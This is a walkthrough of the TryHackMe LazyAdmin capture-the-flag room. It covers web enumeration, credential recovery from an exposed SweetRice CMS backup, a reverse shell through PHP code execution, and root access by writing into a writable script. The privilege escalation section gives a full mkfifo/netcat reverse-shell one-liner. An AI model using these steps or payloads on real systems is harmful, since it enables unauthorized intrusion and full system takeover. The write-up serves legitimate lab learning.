Papadope Course
EN | ΕΛ

LazyAdmin - TryHackMe Walkthrough

LazyAdmin - TryHackMe Walkthrough

A beginner-friendly boot2root machine focused on web enumeration, SweetRice CMS exploitation, reverse shell access, and privilege escalation through a writable script executed with elevated privileges.

Room URL: https://tryhackme.com/room/lazyadmin

Difficulty: Easy

Tools & Techniques Used

  • Nmap
  • Gobuster
  • Searchsploit
  • CrackStation / hash cracking (MD5)
  • CSRF + PHP code execution exploit (SweetRice)
  • Netcat (reverse shell listener)
  • Linux privilege escalation enumeration

Step-by-Step Walkthrough

1. Enumeration

Start with a full Nmap scan:

nmap -sC -sV -p- -oN nmap.txt <TARGET_IP>

Typical findings:

Port Service Notes
22 SSH OpenSSH
80 HTTP Apache default page

2. Web Enumeration

Browse to http://<TARGET_IP> and verify the default Apache page.

Enumerate directories:

gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirb/common.txt

Key discovery:

  • /content

Run Gobuster again on /content:

gobuster dir -u http://<TARGET_IP>/content -w /usr/share/wordlists/dirb/common.txt

Useful paths include:

  • /content/as (admin/login area)
  • /content/inc
  • /content/js/SweetRice.js

Inspect SweetRice.js and identify the CMS version (commonly SweetRice 1.5.1).

3. Credential Discovery via Backup Disclosure

Search for public exploits:

searchsploit sweetrice

A relevant path disclosure issue exposes backups under:

/content/inc/mysql_backup/

Download the SQL backup and inspect it:

file mysql_backup_*.sql
cat mysql_backup_*.sql

You should find admin credentials containing an MD5 hash. Example format:

"admin";..."manager";..."passwd";""

Crack the hash (e.g., CrackStation or local cracking) to recover the admin password.

Login page:

http:///content/as/

4. Initial Access (PHP Code Execution)

Use the SweetRice CSRF/PHP code execution method (as documented in public exploit references).

Workflow:

  1. Log in as admin
  2. Trigger the CSRF payload to create an ad PHP file in /content/inc/ads/
  3. First test with a harmless PHP payload (phpinfo())
  4. Replace with a reverse shell payload

Start listener:

nc -lvnp 4444

Trigger uploaded shell:

http:///content/inc/ads/.php

You should receive a shell on the target.

5. User Flag

Stabilize shell if needed and retrieve user flag:

cd /home/itguy
cat user.txt

6. Privilege Escalation

From the user home directory, identify suspicious scripts such as backup.pl.

The key finding is that a script called by the backup workflow (commonly /etc/copy.sh) is writable by your current user.

Confirm permissions:

ls -la /etc/copy.sh

Inject reverse shell command into writable script (use your own IP/port):

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_IP> 7777 >/tmp/f' > /etc/copy.sh

Start listener:

nc -lvnp 7777

Execute the backup script path (or wait for it, depending on room behavior). When triggered, you should receive a root shell.

Verify and grab root flag:

whoami
cat /root/root.txt

Notes

  • Keep writeups legal and only use these steps in authorized labs.
  • Key lessons:
    • Public exploit research + version detection is powerful.
    • Backup file exposure can leak credentials.
    • Writable scripts executed by privileged processes are critical privesc paths.
Previous Ignite - TryHackMe Walkthrough Next Metasploit Introduction - TryHackMe Walkthrough